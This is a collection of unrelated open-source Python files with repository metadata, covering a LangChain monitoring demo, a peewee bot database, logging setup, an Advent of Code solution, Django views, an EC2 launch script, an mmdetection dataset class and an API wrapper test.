logger.setLevel(logging.DEBUG)

# import and initialize graphsignal
# add GRAPHSIGNAL_API_KEY to your environment variables
import graphsignal
graphsignal.configure(deployment='langchain-demo')
def solve(user_id, task):
    """Run a zero-shot LangChain math agent on `task`, tagging the Graphsignal
    trace with the requesting user id."""
    graphsignal.set_context_tag('user', user_id)
    llm = ChatOpenAI(temperature=0)
    # llm-math gives the agent a calculator tool backed by the same LLM.
    tools = load_tools(["llm-math"], llm=llm)
    agent = initialize_agent(
        tools, llm, agent="zero-shot-react-description", verbose=True
    )
    agent.run(task)
# simulate some requests
while True:
    id = random.randint(0, 10)
    num = random.randint(0, 100)
    try:
        solve(f'user{id}', f"What is {num} raised to .123243 power?")
        logger.debug('Task solved')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # consider `except Exception:` for a demo loop that should be stoppable.
        logger.error("Error while solving task", exc_info=True)
    # Random pacing between simulated requests (up to 5 seconds).
    time.sleep(5 * random.random())
| graphsignal/examples | langchain-app/main.py | main.py | py | 1,010 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "graphsignal.con... |
23059482493 | import peewee
import main
import logging
db_filename = main.CONF.get('VK', 'db_file', fallback='')
# SQLite in WAL mode with foreign keys enforced; synchronous=0 trades crash
# durability for write speed.
db = peewee.SqliteDatabase(db_filename, pragmas={'journal_mode': 'wal',
                                                 'cache_size': 64,
                                                 'foreign_keys': 1,
                                                 'ignore_check_constraints': 0,
                                                 'synchronous': 0})
class User(peewee.Model):
    """A VK user known to the bot."""
    id = peewee.IntegerField(primary_key=True)  # VK user id
    name = peewee.CharField()
    is_fem = peewee.BooleanField()  # female flag
    money = peewee.IntegerField(default=0)  # balance (units unconfirmed)

    class Meta:
        database = db


class Admins(peewee.Model):
    """Marks a User as a bot admin; one row per admin."""
    user = peewee.ForeignKeyField(User, primary_key=True, on_delete='cascade')
    status = peewee.IntegerField(default=0)  # admin level — semantics unconfirmed

    class Meta:
        database = db


class Group(peewee.Model):
    """A VK community tracked as an art source."""
    id = peewee.IntegerField(primary_key=True)
    name = peewee.CharField()
    add_by = peewee.ForeignKeyField(User)  # user who suggested the group
    accepted = peewee.IntegerField(default=0)  # moderation state
    nsfw = peewee.BooleanField(default=False)
    likes = peewee.IntegerField(default=0)
    views = peewee.IntegerField(default=0)
    subs = peewee.IntegerField(default=0)
    # Presumably unix timestamps of the last stats refresh / post / scan — TODO confirm.
    last_update = peewee.IntegerField(default=0)
    last_post = peewee.IntegerField(default=0)
    last_scan = peewee.IntegerField(default=0)

    class Meta:
        database = db


class Price(peewee.Model):
    """Price tiers for a group ("head"/"half"/"full" — exact semantics unconfirmed)."""
    group = peewee.ForeignKeyField(Group, primary_key=True, on_delete='cascade')
    add_by = peewee.ForeignKeyField(User)
    accepted = peewee.IntegerField(default=0)
    last_scan = peewee.IntegerField(default=0)
    head = peewee.IntegerField(default=0)
    half = peewee.IntegerField(default=0)
    full = peewee.IntegerField(default=0)

    class Meta:
        database = db


class Art(peewee.Model):
    """A single artwork harvested from a group."""
    id = peewee.IntegerField(primary_key=True)
    vk_id = peewee.CharField(unique=True)  # VK attachment/post identifier (format unconfirmed)
    url = peewee.CharField(unique=True)
    source = peewee.CharField()
    add_by = peewee.ForeignKeyField(User)
    from_group = peewee.ForeignKeyField(Group, on_delete='cascade')
    accepted = peewee.IntegerField(default=0)
    add_time = peewee.IntegerField(default=0)
    message_id = peewee.IntegerField(default=0)

    class Meta:
        database = db


class Tag(peewee.Model):
    """A descriptive tag attachable to artworks."""
    id = peewee.IntegerField(primary_key=True)
    title = peewee.CharField(default='None')
    description = peewee.CharField(default='None')

    class Meta:
        database = db


class ArtTag(peewee.Model):
    """Many-to-many link between Art and Tag."""
    art = peewee.ForeignKeyField(Art, on_delete='cascade')
    tag = peewee.ForeignKeyField(Tag, on_delete='cascade')

    class Meta:
        database = db
        primary_key = peewee.CompositeKey('art', 'tag')


class Migrations(peewee.Model):
    """Marker rows recording which ad-hoc migrations have been applied."""
    id = peewee.IntegerField(primary_key=True)

    class Meta:
        database = db
def init_db():
    """Create the full schema on a fresh database.

    Returns True when tables were created (all migration markers are
    seeded so update_db() skips them), False when the schema already exists.
    """
    if db.get_tables():
        return False
    db.create_tables([User, Group, Admins, Migrations, Art, Tag, ArtTag, Price])
    for migration_id in (1, 2, 3):
        Migrations.create(id=migration_id)
    return True
def update_admins(admin_list):
    """Ensure every known user listed as a community creator/administrator
    has an Admins row."""
    privileged_roles = {'creator', 'administrator'}
    for entry in admin_list:
        if entry['role'] not in privileged_roles:
            continue
        user = User.get_or_none(id=entry['id'])
        if not user:
            continue
        if not Admins.get_or_none(user=user):
            Admins.create(user=user)
def update_db():
    """Apply any pending ad-hoc schema migrations tracked by the Migrations table."""
    import playhouse.migrate as playhouse_migrate
    # Separate connection with foreign_keys disabled so columns can be added
    # without FK enforcement interfering.
    db_migrate = peewee.SqliteDatabase(db_filename, pragmas={'journal_mode': 'wal',
                                                             'cache_size': 64,
                                                             'foreign_keys': 0,
                                                             'ignore_check_constraints': 0,
                                                             'synchronous': 0})
    migrator = playhouse_migrate.SqliteMigrator(db_migrate)
    # Each migration runs at most once; a Migrations row marks it as applied.
    if not Migrations.get_or_none(1):
        logging.info(f'migration 1')
        playhouse_migrate.migrate(
            migrator.add_column('Group', 'accepted', peewee.BooleanField(default=False)),
        )
        Migrations.create(id=1)
    if not Migrations.get_or_none(2):
        logging.info(f'migration 2')
        playhouse_migrate.migrate(
            migrator.add_column('Group', 'last_scan', Group.last_scan),
            migrator.add_column('Art', 'message_id', Art.message_id),
        )
        Migrations.create(id=2)
    if not Migrations.get_or_none(3):
        logging.info(f'migration 3')
        db.create_tables([Price])
        Migrations.create(id=3)
    # Template kept from earlier migrations:
    # playhouse_migrate.migrate(
    #     migrator.add_column('RpProfile', 'show_link', RpProfile.show_link),
    #     # migrator.rename_column('ProfileSettingList', 'item_id', 'item'),
    #     # migrator.drop_column('RoleOffer', 'to_profile_id')
    # )
if __name__ == "__main__":
    # Run pending schema migrations when executed directly.
    update_db()
    pass
| Sithief/async_bot | database/db_api.py | db_api.py | py | 5,009 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "main.CONF.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "main.CONF",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "peewee.SqliteDatabase",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "peewee.Model",
"l... |
135256696 | from enum import Enum
import logging
import coloredlogs
import itertools
# Registry of logger channels: numeric id -> [lowercase name, UPPERCASE alias].
_LoggerEnums = {
    1: ['system', 'SYSTEM'],
    2: ['client', 'CLIENT'],
    3: ['handler', 'HANDLER'],
}

# Build the Enum via the functional API; for each id the lowercase name
# becomes the canonical member and the uppercase one an alias of it.
LoggerEnums = Enum(
    'LoggerEnums',
    [(alias, number) for number, aliases in _LoggerEnums.items() for alias in aliases],
)
# Keep urllib3's request logging from propagating to the root handlers.
logging.getLogger("urllib3").propagate = False


def initLogging(config):
    """Install coloredlogs on the root logger at the level from config['log']['level']."""
    global logger
    coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s [%(name)10s] [%(levelname).1s] %(message)s'
    coloredlogs.DEFAULT_DATE_FORMAT = '%Y-%m-%d %H:%M:%S.%f'
    coloredlogs.DEFAULT_FIELD_STYLES = {'asctime': {'color': 'cyan'}, 'name': {'bold': True, 'color': 'black'}, 'levelname': {'bold': True, 'color': 'black'}}
    coloredlogs.install(level=config['log']['level'])
def getLogger(type: LoggerEnums):
    """Return the stdlib logger named after the given LoggerEnums member."""
    return logging.getLogger(type.name)
| techolutions/madqtt-pi | madqtt/utils/Logging.py | Logging.py | py | 900 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.chain.from_iterable",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "itertools.chain",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "itertool... |
17929496471 | #!/usr/bin/python3
import sys
import collections
class Tree:
    """A node of the AoC day-8 license tree: child nodes plus metadata entries."""

    # Class-level placeholders kept for backward compatibility; every
    # instance gets its own fresh deques in __init__.
    children = None
    metadata = None

    def __init__(self):
        self.children = collections.deque()
        self.metadata = collections.deque()

    def __repr__(self):
        # Debug aid: show arity and metadata without recursing into children.
        return 'Tree(children=%d, metadata=%r)' % (len(self.children), list(self.metadata))
def parse_input(line=None):
    """Yield the whitespace-separated integers of one input line.

    When *line* is None (the original call signature) a single line is read
    from stdin, preserving backward compatibility.

    BUG FIX: the original hand-rolled digit loop evaluated ``line[i]``
    before checking ``i < len(line)``, so it raised IndexError while
    consuming the final number of the line. Splitting the line avoids the
    manual index bookkeeping entirely.
    """
    if line is None:
        line = next(sys.stdin)
    for token in line.split():
        yield int(token)
def build_tree(line=None, i=None):
    """Recursively parse the flat number list into a Tree.

    Returns a (tree, next_index) pair. With no arguments the numbers are
    read from a single stdin line and parsing starts at index 0.
    """
    if not line:
        line = [int(tok) for tok in next(sys.stdin).split()]
        i = 0
    node = Tree()
    n_children, n_metadata = line[i], line[i + 1]
    cursor = i + 2
    if n_children == 0:
        # Leaf: metadata immediately follows the two-entry header.
        node.metadata.extend(line[cursor:cursor + n_metadata])
        return (node, cursor + n_metadata)
    for _ in range(n_children):
        child, cursor = build_tree(line, cursor)
        node.children.append(child)
    node.metadata.extend(line[cursor:cursor + n_metadata])
    return (node, cursor + n_metadata)
def checksum(tree):
    """Sum every metadata entry in the whole tree (puzzle part 1)."""
    return sum(tree.metadata) + sum(checksum(child) for child in tree.children)
def value(tree):
    """Compute a node's value (puzzle part 2).

    A leaf's value is the sum of its metadata. Otherwise every non-zero
    metadata entry is a 1-based child index; out-of-range indexes
    contribute nothing, and the referenced children's values are summed.
    """
    if len(tree.children) == 0:
        return sum(tree.metadata)
    child_count = len(tree.children)
    total = 0
    for entry in tree.metadata:
        if entry != 0 and entry - 1 < child_count:
            total += value(tree.children[entry - 1])
    return total
def main():
    """Read the tree from stdin and print both puzzle answers."""
    (t, _) = build_tree()
    print(checksum(t))
    print(value(t))


if __name__ == "__main__":
    main()
| Easimer/advent-of-code-2018 | day8/day8.py | day8.py | py | 1,553 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin",
"l... |
4079006523 | """
Plot omega, sliding net charge
plot sliding fraction of Q/N, S/T, A/G, P
"""
import os
import pandas as pd
import matplotlib.pyplot as plt
from deconstruct_lc import tools_lc
from deconstruct_lc.complementarity import motif_seq
class Fraction(object):
    """Plot sliding per-k-mer composition fractions along a sequence, with
    LCA/LCE motif positions overlaid as scatter points."""

    def __init__(self):
        # Motif-detection parameters: k-mer size, LCA alphabet, LCE cutoff.
        self.k = 6
        self.lca = 'SGEQAPDTNKR'
        self.lce = 1.6

    def process_seq(self, seq, k):
        """Plot composition traces for `seq` (window size `k`) and show the figure.

        Only the ST and P traces plus the motif scatter are currently drawn;
        the other fractions are computed but their plot calls are commented out.
        """
        kmers = tools_lc.seq_to_kmers(seq, k)
        qn = self.alph_fracs(kmers, 'QN')
        st = self.alph_fracs(kmers, 'ST')
        ag = self.alph_fracs(kmers, 'AG')
        p = self.alph_fracs(kmers, 'P')
        ed = self.alph_fracs(kmers, 'ED')
        kr = self.alph_fracs(kmers, 'KR')
        f = self.alph_fracs(kmers, 'F')
        r = self.alph_fracs(kmers, 'R')
        #plt.plot(qn, label='QN')
        plt.plot(st, label='ST')
        #plt.plot(ag, label='AG')
        #plt.plot(r, label='R')
        #plt.plot(f, label='F')
        lca_x, lca_y, lce_x, lce_y = self.get_motif_index(seq)
        # LCA motif hits in black at y=1, LCE hits in red at y=1.1.
        plt.scatter(lca_x, lca_y, color='black', s=2)
        plt.scatter(lce_x, lce_y, color='red', s=2)
        #plt.plot(ed, label='ED')
        #plt.plot(kr, label='KR')
        plt.plot(p, label='P')
        plt.legend()
        plt.show()

    def alph_fracs(self, kmers, alph):
        """Return the fraction of `alph` characters in each k-mer, in order."""
        fracs = []
        for kmer in kmers:
            frac = self.get_frac(kmer, alph)
            fracs.append(frac)
        return fracs

    def get_frac(self, kmer, alph):
        """Fraction of `kmer` characters that belong to the alphabet `alph`."""
        tot_count = 0
        for aa in alph:
            tot_count += kmer.count(aa)
        assert tot_count <= len(kmer)
        frac = float(tot_count)/float(len(kmer))
        return frac

    def get_motif_index(self, sequence):
        """Return LCA and LCE motif k-mer positions with constant y values for
        scatter overlay (LCA at y=1, LCE at y=1.1)."""
        mot = motif_seq.LcSeq(sequence, self.k, self.lca, 'lca')
        ind_in, ind_out = mot._get_motif_indexes()
        lca_x = list(ind_in)
        lca_y = [1]*(len(lca_x))
        mot = motif_seq.LcSeq(sequence, self.k, self.lce, 'lce')
        ind_in, ind_out = mot._get_motif_indexes()
        lce_x = list(ind_in)
        lce_y = [1.1]*(len(lce_x))
        return lca_x, lca_y, lce_x, lce_y
class Pipeline(object):
    """Interactively inspect high-scoring NMO sequences via Fraction plots."""

    def __init__(self):
        # Score files produced elsewhere; the column labels encode the
        # motif parameters (k=6, alphabet, entropy cutoff).
        self.base_fp = os.path.join(os.path.dirname(__file__), '..', 'data')
        self.nmo_fpi = os.path.join(self.base_fp, 'scores',
                                    'nmo_6_SGEQAPDTNKR_6_1.6_seq_scores.tsv')
        self.pdb_fpi = os.path.join(self.base_fp, 'scores',
                                    'pdb_nomiss_cd50_6_SGEQAPDTNKR_6_1.6_seq_scores.tsv')
        self.lca_label = '6_SGEQAPDTNKR'
        self.lce_label = '6_1.6'

    def sandbox(self):
        """Iterate NMO sequences with LCA score > 30 (ascending) and plot each one."""
        label = self.lca_label
        df = pd.read_csv(self.nmo_fpi, sep='\t', index_col=0)
        df = df[(df[label] > 30)]
        df = df.sort_values(by=[label])
        df = df.reset_index(drop=True)
        for i, row in df.iterrows():
            sequence = row['Sequence']
            print(len(sequence))
            print(row[label])
            print(row['Protein ID'])
            frac = Fraction()
            frac.process_seq(sequence, 6)
def main():
    """Entry point: run the interactive plotting sandbox."""
    pipe = Pipeline()
    pipe.sandbox()


if __name__ == '__main__':
    main()
{
"api_name": "deconstruct_lc.tools_lc.seq_to_kmers",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "deconstruct_lc.tools_lc",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 30,
"usage_type": "call"
},
{
... |
32105984708 | from datetime import datetime
from string import Template
import pandas as pd
def read_template(file: str) -> Template:
    """Read *file* and return its contents wrapped in a string.Template.

    The file is decoded as UTF-8 explicitly so the generated HTML does not
    depend on the platform's default encoding.
    """
    with open(file, "r", encoding="utf-8") as f:
        content = f.read()
    return Template(content)
# Load the exported dataset and normalise types / missing values.
df = pd.read_csv("export.csv")
df = df.astype(
    {
        # Nullable Int64 so rows with a missing star count survive the cast.
        "repository_stars_count": "Int64",
    }
)
# Blank out missing text fields so they render as empty table cells.
df = df.fillna(
    {
        "repository_domain": "",
        "description": "",
        "repository_last_update": "",
        "distribution": "",
    }
)

# Static <thead> markup for the generated HTML table.
header = (
    "<thead>\n"
    "<tr>\n"
    "<th>Name</th>\n"
    "<th>Repository</th>\n"
    "<th>Repository Stars Count</th>\n"
    "<th>Repository Last Update</th>\n"
    "<th>Repository Domain</th>\n"
    "<th>Categories</th>\n"
    "<th>Compatibility</th>\n"
    "<th>Frameworks</th>\n"
    "<th>Distribution</th>\n"
    "<th>Description</th>\n"
    "</tr>\n"
    "</thead>\n"
)
# Build one <tr> per dataset row.
table_data = "<tbody>\n"
for index, row in df.iterrows():
    name = f"<a href='{row['url']}'>{row['name']}</a></td>"
    table_data += (
        "<tr>\n"
        "<td>"
        f"{name}"
        "\n"
        f"<td><a href='{row['repository']}'>{row['repository']}</a></td>"
        "\n"
        f"<td>{row['repository_stars_count']}</td>"
        "\n"
        f"<td>{row['repository_last_update']}</td>"
        "\n"
        f"<td>{row['repository_domain']}</td>"
        "\n"
        f"<td>{row['categories']}</td>"
        "\n"
        f"<td>{row['compatibility']}</td>"
        "\n"
        f"<td>{row['frameworks']}</td>"
        "\n"
        f"<td>{row['distribution']}</td>"
        "\n"
        f"<td>{row['description']}</td>"
        "\n"
        "</tr>\n"
    )
table_data += "</tbody>\n"

# Stamp today's date and render the template into the published page.
date_update = datetime.today().strftime("%Y-%m-%d")
formatted_message = read_template("template.html").safe_substitute(
    {"date_update": date_update, "header": header, "table_data": table_data}
)
with open("docs/index.html", "w") as f:
    f.write(formatted_message)
| dbeley/lpa-table | lpa_html_builder.py | lpa_html_builder.py | py | 1,930 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "string.Template",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "string.Template",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.toda... |
36408701647 | from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic
from .forms import PilotForm
from .models import Site, Pilot, Comment
from . import creed
from . import webster
import datetime
import traceback
class IndexView(generic.ListView):
    """Landing page: lists recent sites and runs the test suite for a submitted URL."""
    template_name = 'assure/index.html'
    context_object_name = 'latest_site_list'
    fields = ['url']
    form_class = PilotForm
    model = Site

    def __init__(self):
        # Browser-driver wrapper and the test-suite runner built on it.
        self.webster = webster.Webster()
        self.creed = creed.Main(self.webster)

    def get_queryset(self):
        """Return the last five published sites."""
        return Site.objects.order_by('-pub_date')[:5]

    def get_context_data(self, **kwargs):
        """Expose all sites plus the URL-submission form to the template."""
        context = super().get_context_data(**kwargs)
        context['latest_site_list'] = Site.objects.all()
        context.update({'form':self.form_class})
        return context

    def post(self, request):
        """Create/refresh the Site for the posted URL, run tests, redirect to detail."""
        if request.method == 'POST':
            site=''
            pilot=''
            url=''
            form = PilotForm(request.POST)
            if form.is_valid():
                # NOTE(review): the validity flag returned alongside the URL is
                # discarded, so malformed URLs fall through unchecked.
                url,url_test = self.validate_url(request.POST.get('url'))
            try: #fails = site is new and requires a report
                site = Site.objects.get(url__contains=url)
            except Site.DoesNotExist:
                site = Site(url=url,pub_date=datetime.datetime.now(),domain=url.split('.')[1])
                site.save()
            finally:
                try:
                    # Existing report: refresh it with a fresh test run.
                    pilot = Pilot.objects.get(site=site)
                    dictionary = self.creed.test_units(url=site.url)
                    pilot.pub_date=datetime.datetime.now()
                    pilot.viewport_json=dictionary['viewport']
                    pilot.site_json=dictionary['site']
                    pilot.homepage_json=dictionary['homepage']
                    pilot.save()
                except Pilot.DoesNotExist:
                    try:
                        # First report for this site.
                        dictionary = self.creed.test_units(url=url)
                        pilot = Pilot(site=site,current_rating=9,pub_date=datetime.datetime.now(),viewport_json=dictionary['viewport'],site_json=dictionary['site'])
                        pilot.save()
                    except Exception as e:
                        # Test run failed: tear down the driver and drop the orphaned Site.
                        traceback.print_exc()
                        self.creed.quit_driver()
                        Site.objects.get(url__contains=url).delete()
            return HttpResponseRedirect(reverse('assure:detail', args=(site.id,)))
            #return self.render_to_response(self.get_context_data(context_object_name=self.context_object_name, form=form))

    def validate_url(self, url):
        """Return (url, matched) where matched is True when url looks like an HTTP/FTP URL."""
        import re
        regex = re.compile(
            r'^(?:http|ftp)s?://' # http:// or https://
            r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
            r'localhost|' #localhost...
            r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
            r'(?::\d+)?' # optional port
            r'(?:/?|[/?]\S+)$', re.IGNORECASE
        )
        return url,re.match(regex, url) is not None
class DetailView(generic.DetailView):
    """Site detail page: shows the latest Pilot report and re-runs tests on POST."""
    model = Site
    template_name = 'assure/detail.html'
    context_object_name = 'latest_report'
    fields = ['url']
    form_class = PilotForm

    def __init__(self):
        # Browser-driver wrapper and the test-suite runner built on it.
        self.webster = webster.Webster()
        self.creed = creed.Main(self.webster)

    def get_context_data(self, **kwargs):
        """Attach the site's latest Pilot report (or None) and the re-test form."""
        context = super().get_context_data(**kwargs)
        site = Site.objects.get(url__contains=kwargs['object'])
        try:
            pilot = Pilot.objects.get(site=site)
        except Pilot.DoesNotExist:
            pilot = None
        context['latest_report'] = pilot
        context.update({'form': self.form_class})
        return context

    def post(self, request, pk):
        """Re-run the test suite for the site and refresh (or create) its Pilot."""
        if request.method == 'POST':
            dictionary = {}
            site = ''
            pilot = ''
            form = PilotForm(request.POST)
            try:
                site = Site.objects.get(pk=pk)
                pilot = Pilot.objects.get(site=site)
            except Pilot.DoesNotExist:
                pilot = Pilot(site=site)
            finally:
                try:
                    # Existing report: refresh it with a fresh test run.
                    pilot = Pilot.objects.get(site=site)
                    dictionary = self.creed.test_units(url=site.url)
                    pilot.pub_date = datetime.datetime.now()
                    pilot.viewport_json = dictionary['viewport']
                    pilot.site_json = dictionary['site']
                    pilot.homepage_json = dictionary['homepage']
                    pilot.save()
                except Pilot.DoesNotExist:
                    try:
                        # First report for this site.
                        dictionary = self.creed.test_units(url=site.url)
                        pilot = Pilot(site=site,
                                      current_rating=9,
                                      pub_date=datetime.datetime.now(),
                                      viewport_json=dictionary['viewport'],
                                      site_json=dictionary['site'])
                        pilot.save()
                    except Exception as e:
                        traceback.print_exc()
                        self.creed.quit_driver()
                        # BUG FIX: the cleanup referenced an undefined name
                        # `url`, raising NameError inside this handler; delete
                        # by the site's own URL instead.
                        Site.objects.get(url__contains=site.url).delete()
            return HttpResponseRedirect(reverse('assure:detail', args=(site.id,)))
'''def detail(request, site_id):
pilot = get_object_or_404(Pilot, pk=site_id)
return render(request, 'assure/detail.html', {'pilot':pilot})'''
class ResultsView(generic.DetailView):
    """Read-only results page for a single Site."""
    model = Site
    template_name = 'assure/results.html'
def comment(request, site_id):
    """Record a vote-style choice for a site (adapted from the Django polls tutorial).

    NOTE(review): `Choice` is never imported in this module, so entering the
    `except (KeyError, Choice.DoesNotExist)` clause raises NameError —
    confirm the intended model and import it.
    """
    site = get_object_or_404(Site, pk=site_id)
    try:
        selected_choice = site.choice_set.get(pk=request.POST['choice'])
    except (KeyError, Choice.DoesNotExist):
        # Redisplay the site voting form.
        return render(request, 'assure/detail.html', {
            'site': site,
            'error_message': "You didn't select a choice.",
        })
    else:
        selected_choice.votes += 1
        selected_choice.save()
        # Always return an HttpResponseRedirect after successfully dealing
        # with POST data. This prevents data from being posted twice if a
        # user hits the Back button.
        return HttpResponseRedirect(reverse('assure:results', args=(site.id,)))
| chadwickcheney/SeleniumTests | assure/views.py | views.py | py | 6,511 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.views.generic.ListView",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "django.views.generic",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "forms.PilotForm",
"line_number": 16,
"usage_type": "name"
},
{
"api_name"... |
#!/usr/bin/env python
import boto3
import subprocess
#output = subprocess.call(['/home/ansadmin/nagaratest/docker.sh'])
import time
ec2 = boto3.resource('ec2')
import yaml
# Launch parameters (AMI, counts, instance type, key pair, subnet) come from config.yml.
# NOTE(review): yaml.load without an explicit Loader is unsafe/deprecated —
# prefer yaml.safe_load for this trusted local file.
config = yaml.load(open('config.yml'))
# NOTE(review): duplicate of the resource created above.
ec2 = boto3.resource('ec2')
# Launch an instance whose user-data bootstraps Docker and serves a Tomcat demo on 8080.
instance = ec2.create_instances(
    ImageId = config['ImageId'],
    MinCount = config['MinCount'],
    MaxCount = config['MaxCount'],
    InstanceType = config['InstanceType'],
    KeyName = config['KeyName'],
    SubnetId = config['SubnetId'],
    UserData = '#!/bin/bash'+'\n'+'sudo su'+'\n'+'yum update -y'+'\n'+'yum install docker -y'+'\n'+'yum install git -y'+'\n'+'git clone https://github.com/asquarezone/DockerZone.git /home/ec2-user/tomcat_test'+'\n'+'sleep 15'+'\n'+'service docker start'+'\n'+'docker build -t tomcat_test /home/ec2-user/tomcat_test/ImageCreation/DockerFiles/tomcat_demo'+'\n'+'docker run -itd -p 8080:8080 tomcat_test')
print (instance[0].id)
instance = instance[0]
# Wait for the instance to enter the running state
instance.wait_until_running()
# Reload the instance attributes
instance.load()
print (instance.public_ip_address)
print ( "url is: " + instance.public_dns_name + ":8080" )
| hotkey123/test | nagaratest/final_create_instance.py | final_create_instance.py | py | 1,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.resource",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "yaml.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "boto3.resource",
"line_number": 10,
"usage_type": "call"
}
] |
29976613151 | import os.path as osp
import mmcv
import numpy as np
import pycocotools.mask as maskUtils
from pycocotools.coco import COCO
from .coco import CocoDataset
from .registry import DATASETS
@DATASETS.register_module
class SideWalkDataset(CocoDataset):
    """COCO-format dataset of sidewalk obstacles (29 classes)."""

    CLASSES = ('barricade', 'bench', 'bicycle', 'bollard', 'bus', 'car',
               'carrier', 'cat', 'chair', 'dog', 'fire_hydrant', 'kiosk',
               'motorcycle', 'movable_signage', 'parking_meter', 'person',
               'pole', 'potted_plant', 'power_controller', 'scooter', 'stop',
               'stroller', 'table', 'traffic_light',
               'traffic_light_controller', 'traffic_sign', 'tree_trunk',
               'truck', 'wheelchair')

    def load_annotations(self, ann_file):
        """Load COCO annotations; each image's filename is joined with its
        per-image 'img_prefix' entry from the annotation file."""
        self.coco = COCO(ann_file)
        self.cat_ids = self.coco.getCatIds()
        # Map COCO category ids to contiguous labels starting at 1 (0 = background).
        self.cat2label = {
            cat_id: i + 1
            for i, cat_id in enumerate(self.cat_ids)
        }
        self.img_ids = self.coco.getImgIds()
        img_infos = []
        for i in self.img_ids:
            info = self.coco.loadImgs([i])[0]
            info['filename'] = osp.join(info['img_prefix'], info['file_name'])
            img_infos.append(info)
        return img_infos

    def show_annotations(self, img_id, show=False, out_file=None, **kwargs):
        """Render ground-truth masks and boxes for one image.

        Returns the rendered image array when neither `show` nor `out_file`
        is given; otherwise mmcv handles display/saving.
        """
        img_info = self.img_infos[img_id]
        img_path = osp.join(self.img_prefix, img_info['filename'])
        img = mmcv.imread(img_path)
        annotations = self.coco.loadAnns(self.coco.getAnnIds(imgIds=[img_id]))
        bboxes = []
        labels = []
        class_names = ['bg'] + list(self.CLASSES)
        for ann in annotations:
            if len(ann['segmentation']) > 0:
                rle = maskUtils.frPyObjects(ann['segmentation'],
                                            img_info['height'],
                                            img_info['width'])
                # BUG FIX: `np.bool` was removed in NumPy 1.24; the builtin
                # `bool` is what the alias pointed to.
                ann_mask = np.sum(
                    maskUtils.decode(rle), axis=2).astype(bool)
                # Blend a random colour into the masked pixels.
                color_mask = np.random.randint(0, 256, (1, 3), dtype=np.uint8)
                img[ann_mask] = img[ann_mask] * 0.5 + color_mask * 0.5
            bbox = ann['bbox']
            x, y, w, h = bbox
            bboxes.append([x, y, x + w, y + h])
            labels.append(ann['category_id'])
        bboxes = np.stack(bboxes)
        labels = np.stack(labels)
        mmcv.imshow_det_bboxes(
            img,
            bboxes,
            labels,
            class_names=class_names,
            show=show,
            out_file=out_file,
            **kwargs)
        if not (show or out_file):
            return img
| ytaek-oh/mmdetection | mmdet/datasets/sidewalk.py | sidewalk.py | py | 2,636 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "coco.CocoDataset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "pycocotools.coco.COCO",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"li... |
8680864840 | """The module contains test functions to test Tankerkoenig API wrapper."""
import tempfile
import os
from unittest import TestCase
from unittest.mock import MagicMock, patch
from homemonitoring.tankerkoenig import TankerKoenig
class TestTankerKoenig(TestCase):
    """TestTankerKoenig contains the test cases for the TankerKoenig class."""

    # Canned detail responses keyed by station id, served by the mocked _call_api.
    RESPONSE_DETAIL_FIXTURES = {
        "id_1": {
            "station": {"id": "id_1"}
        }
    }

    @patch("requests.get")
    def test_call_api(self, mock):
        """Checks function that composes API call."""
        apikey = 'apikey'
        ids = "1,2,3"
        api = TankerKoenig(apikey)
        api._call_api('details.php', ids=ids)
        # The apikey must be merged into the caller-supplied query params.
        mock.assert_called_with(
            'https://creativecommons.tankerkoenig.de/json/details.php',
            params={'ids': ids, 'apikey': apikey}
        )

    def test_get_station_details(self):
        """Checks get station details: API call, cache-file hit, forced refresh."""
        station_id = 'id_1'
        with tempfile.TemporaryDirectory() as tmp_dir:
            api = TankerKoenig('api-key', cache_dir=tmp_dir)

            def mock_call_api(endpoint, **params):
                # Serve the fixture matching the requested station id.
                return self.RESPONSE_DETAIL_FIXTURES[params['id']]

            api._call_api = MagicMock(side_effect=mock_call_api)
            # call "API"
            got = api.get_station_details(station_id, force_update=True)
            expected = {'station': {'id': 'id_1'}}
            self.assertDictEqual(got, expected)
            assert os.path.exists(os.path.join(tmp_dir, f'{station_id}.json'))
            api._call_api.assert_called_once()
            # this time from file
            got = api.get_station_details(station_id, force_update=False)
            self.assertDictEqual(got, expected)
            api._call_api.assert_called_once()  # API should not have been called again
            # this time force update
